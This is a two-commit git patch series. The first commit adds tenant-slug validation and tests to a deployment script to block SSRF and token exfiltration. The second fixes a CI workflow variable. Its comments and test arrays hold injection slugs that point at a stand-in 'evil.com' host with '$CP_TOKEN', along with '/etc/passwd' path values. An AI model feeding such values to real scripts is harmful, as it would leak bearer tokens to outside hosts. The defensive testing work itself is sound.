From 47aa82f0f29a197b444183b92a353384e1e19e28 Mon Sep 17 00:00:00 2001
From: Molecule AI Core-BE <core-be@agents.moleculesai.app>
Date: Thu, 14 May 2026 02:46:11 +0000
Subject: [PATCH 1/2] fix(scripts): add slug validation to prevent SSRF + token
 exfiltration (OFFSEC-006)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

OFFSEC-006: tenant slug interpolated into URLs (cp_redeploy_tenant,
tenant_buildinfo, tenant_health, resolve_tenant_instance_id) without
validation, enabling SSRF via slug=?url=https://evil.com and token
exfiltration via slug=?url=https://evil.com&token=$CP_TOKEN.

Changes:
- scripts/promote-tenant-image.sh:
  - Added `set -f` (noglob) at top to prevent glob metacharacter expansion
    in slug strings before any network call.
  - Added validate_slug() with RFC-1123 regex ^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$
    to reject malformed slugs before any URL interpolation.
  - Added validate_tenants() called after argument parsing (exit 64).
  - Placed early err() stub before validate_slug to avoid forward-reference.
- scripts/test-promote-tenant-image.sh: Added 3 new test groups (13–15):
  - Test 13: valid slugs (single-char, hyphenated, alphanum) pass.
  - Test 14: 10 malformed slug patterns rejected before any network call.
  - Test 15: 6 SSRF + token-exfiltration injection patterns rejected.
  All 43 tests pass.

Closes: molecule-ai/molecule-core#929

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
---
 scripts/promote-tenant-image.sh      | 54 +++++++++++++++++
 scripts/test-promote-tenant-image.sh | 88 ++++++++++++++++++++++++++++
 2 files changed, 142 insertions(+)

diff --git a/scripts/promote-tenant-image.sh b/scripts/promote-tenant-image.sh
index c8b21b8a..d621fb1d 100755
--- a/scripts/promote-tenant-image.sh
+++ b/scripts/promote-tenant-image.sh
@@ -54,6 +54,57 @@
 #   64  argument/usage error
 
 set -euo pipefail
+# Disable pathname expansion so a tenant slug containing *, ? or [ stays a
+# literal string even if it ever reaches an unquoted expansion. This is
+# defence in depth only: the control that actually stops injection slugs such
+# as "evil?url=https://attacker.com?token=..." is the validate_slug check
+# below, which rejects them before any network call is made.
+set -f
+
+# ─────────────────────────────────────────────────────────────────────────────
+# Slug validation (OFFSEC-006)
+# ─────────────────────────────────────────────────────────────────────────────
+#
+# Slugs are interpolated into URL paths (cp_redeploy_tenant, tenant_buildinfo,
+# tenant_health, resolve_tenant_instance_id) and ECR identifiers. An unsanitised
+# slug can trigger:
+#   1. SSRF   — slug=https://evil.com?x= injected as URL authority/path segment.
+#   2. Token exfiltration — slug=?url=https://evil.com&token=$CP_TOKEN causes
+#      curl to issue a GET to the attacker's host, leaking the bearer token.
+# The guard above (set -f) blocks glob metacharacter expansion; this function
+# validates the slug shape so malformed names are rejected before any network
+# call is issued.
+
+# Simple logging helper — defined early so validate_slug can call err
+# before the full Steps block is reached. The real definition (with full
+# timestamps) lives in the Steps section and re-declares it idempotently.
+err() { printf '[%s] ERROR: %s\n' "$(date -u +%H:%M:%SZ)" "$*" >&2; }
+
+# Validates a single tenant slug against RFC-1123 + lowercase + max 63 chars.
+# arg1 = slug string
+# returns 0 if the slug is valid; otherwise logs via err and returns 1.
+validate_slug() {
+  local slug="$1"
+  # RFC-1123 label: lowercase alphanumerics and hyphens (runs of hyphens are
+  # accepted), no leading/trailing hyphen, 1–63 chars total, single char allowed.
+  if [[ ! "$slug" =~ ^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$ ]]; then
+    err "invalid tenant slug: '$slug' (must match ^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$; got '${slug//$'\n'/<LF>}')"
+    return 1
+  fi
+  return 0
+}
+
+# Validates every slug in $TENANTS before any network call; returns 0 or 1.
+# read -d '' takes the whole value, so text after a newline is checked too.
+validate_tenants() {
+  local slug
+  IFS=',' read -r -d '' -a SLUGS < <(printf '%s\0' "$TENANTS")
+  for slug in "${SLUGS[@]}"; do
+    [[ -z "$slug" ]] && { err "empty slug in --tenants list"; return 1; }
+    validate_slug "$slug" || return 1
+  done
+  return 0
+}
 
 # ─────────────────────────────────────────────────────────────────────────────
 # Argument parsing
@@ -101,6 +152,9 @@ done
   exit 64
 }
 
+# Validate slugs before any network call (OFFSEC-006)
+validate_tenants || exit 64
+
 # Snapshot/rollback tag (deterministic — same script run on same UTC date
 # is idempotent; cross-day reruns get distinct rollback points).
 TODAY="${NOW_OVERRIDE_DATE:-$(date -u +%Y%m%d)}"
diff --git a/scripts/test-promote-tenant-image.sh b/scripts/test-promote-tenant-image.sh
index eac19195..8000942b 100644
--- a/scripts/test-promote-tenant-image.sh
+++ b/scripts/test-promote-tenant-image.sh
@@ -334,6 +334,94 @@ python3 -c "import sys,json; d=json.loads(sys.stdin.read()); c=d['commands'][0];
   && echo "  ok: no double-encoding in command string" || { echo "  FAIL"; exit 1; }
 # ─────────────────────────────────────────────────────────────────────────────
 
+printf '\n== Test 13: valid slugs pass validate_tenants ==\n'  # "a" covers the 1-char case
+m=$(mkmock)
+mock_set "$m" aws_ecr_get_image  '{}' 0
+mock_set "$m" aws_ecr_describe_image '' 1
+mock_set "$m" aws_ecr_put_image  '' 0
+mock_set "$m" cp_redeploy_tenant '{}' 0
+mock_set "$m" tenant_buildinfo  '{}' 0
+mock_set "$m" tenant_health     'ok' 0
+out=$(NOW_OVERRIDE_DATE=20260514 SSM_SETTLE_SECONDS=0 \
+  "$SCRIPT" --source-tag a --dest-tag b --tenants a,xy-z,a1b2c3 --mock-dir "$m" 2>&1
+  echo "EXIT_CODE=$?")
+assert_exit "valid slugs (single-char, hyphenated, alphanum) pass" "$out" 0
+rm -rf "$m"
+
+printf '\n== Test 14: malformed slugs rejected before any network call (OFFSEC-006) ==\n'
+# Patterns that must all be rejected with exit 64 and an invalid-slug error.
+# We test a representative sample covering each failure class. Each run gets a
+# throwaway --mock-dir (as in Test 15) so that a slug which slipped past
+# validation is expected to land in the mock layer, not on a real endpoint.
+declare -a BAD=(
+  'bad slug'           # space
+  'UpperCase'          # uppercase
+  'has_underscore'     # underscore
+  'has.dot'            # dot
+  '-leading-hyphen'    # leading hyphen
+  'trailing-hyphen-'   # trailing hyphen
+  '!bang'              # punctuation
+  'query=val'          # = character
+  'a b c'              # spaces
+  'A'                  # uppercase single char
+)
+bad_count=0
+for bad in "${BAD[@]}"; do
+  m=$(mkmock)
+  rc=0; out=$("$SCRIPT" --source-tag a --dest-tag b --tenants "$bad" --mock-dir "$m" 2>&1) || rc=$?
+  rm -rf "$m"
+  if [[ $rc -eq 64 ]] && grep -qi 'invalid tenant slug' <<<"$out"; then
+    : # expected
+  else
+    bad_count=$((bad_count + 1))
+    printf '  ✗ slug=%q should exit 64 with invalid-slug error (got %s)\n' "$bad" "$rc"
+  fi
+done
+if [[ $bad_count -eq 0 ]]; then
+  PASS=$((PASS + 1)); printf '  ✓ all %d malformed slugs rejected before network call\n' "${#BAD[@]}"
+else
+  FAIL=$((FAIL + 1)); FAIL_NAMES+=("malformed-slug rejection")
+fi
+
+printf '\n== Test 15: SSRF + token-exfiltration injection patterns rejected (OFFSEC-006) ==\n'
+# These patterns represent the actual OFFSEC-006 attack vectors: a malicious
+# slug that, if interpolated into a URL, would cause the script to issue an
+# outbound HTTP request to an attacker-controlled host, leaking the CP_TOKEN.
+# Each must exit 64, and the mock dir's .calls file must hold no curl/aws_
+# entries. ($CP_TOKEN is single-quoted below, so it is passed as literal text.)
+declare -a INJECT=(
+  '?url=https://evil.com'
+  '?url=https://evil.com?token=$CP_TOKEN'
+  'https://evil.com'
+  '-o-https://evil.com'
+  '--output=/etc/passwd'
+  '../etc/passwd'
+)
+inject_count=0
+for inject in "${INJECT[@]}"; do
+  m=$(mkmock)
+  set +e
+  out=$("$SCRIPT" --source-tag a --dest-tag b --tenants "$inject" --mock-dir "$m" 2>&1); rc=$?
+  set -e
+  curl_called=0
+  aws_called=0
+  if grep -qE '^curl ' "$m/.calls" 2>/dev/null; then curl_called=1; fi
+  if grep -qE '^aws_' "$m/.calls" 2>/dev/null; then aws_called=1; fi
+  rm -rf "$m"
+  if [[ $rc -eq 64 ]] && [[ $curl_called -eq 0 ]] && [[ $aws_called -eq 0 ]]; then
+    : # expected
+  else
+    inject_count=$((inject_count + 1))
+    printf '  ✗ slug=%q: expected exit 64 + no curl/aws (rc=%s curl=%s aws=%s)\n' \
+      "$inject" "$rc" "$curl_called" "$aws_called"
+  fi
+done
+if [[ $inject_count -eq 0 ]]; then
+  PASS=$((PASS + 1)); printf '  ✓ all %d injection slugs rejected before network call\n' "${#INJECT[@]}"
+else
+  FAIL=$((FAIL + 1)); FAIL_NAMES+=("SSRF-injection rejection")
+fi
+
 printf '\n────────────────────────────────────\n'
 if [[ $FAIL -eq 0 ]]; then
   printf 'All %d tests passed.\n' "$PASS"

From 3a430369505348cf32500d71160a7c826d0ebfec Mon Sep 17 00:00:00 2001
From: Molecule AI Core-BE <core-be@agents.moleculesai.app>
Date: Thu, 14 May 2026 02:49:38 +0000
Subject: [PATCH 2/2] fix(ci): use GITHUB_EVENT_BEFORE in handlers-pg-integ
 detect-changes

The Gitea Actions `github.event.before` template expression evaluates to
empty string in shell scripts (Gitea Actions does not expand these objects
to JSON strings). Use the shell environment variable `GITHUB_EVENT_BEFORE`
instead, which Gitea Actions correctly populates for push events.

Same fix as #919 applied to handlers-postgres-integration.yml.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
---
 .gitea/workflows/handlers-postgres-integration.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.gitea/workflows/handlers-postgres-integration.yml b/.gitea/workflows/handlers-postgres-integration.yml
index bb4cd81e..ea9e8ed6 100644
--- a/.gitea/workflows/handlers-postgres-integration.yml
+++ b/.gitea/workflows/handlers-postgres-integration.yml
@@ -90,7 +90,7 @@ jobs:
       - id: filter
         # Inline replacement for dorny/paths-filter — see e2e-api.yml.
         run: |
-          BASE="${GITHUB_BASE_REF:-${{ github.event.before }}}"
+          BASE="${GITHUB_BASE_REF:-${GITHUB_EVENT_BEFORE:-}}"
           if [ "${{ github.event_name }}" = "pull_request" ] && [ -n "${{ github.event.pull_request.base.sha }}" ]; then
             BASE="${{ github.event.pull_request.base.sha }}"
           fi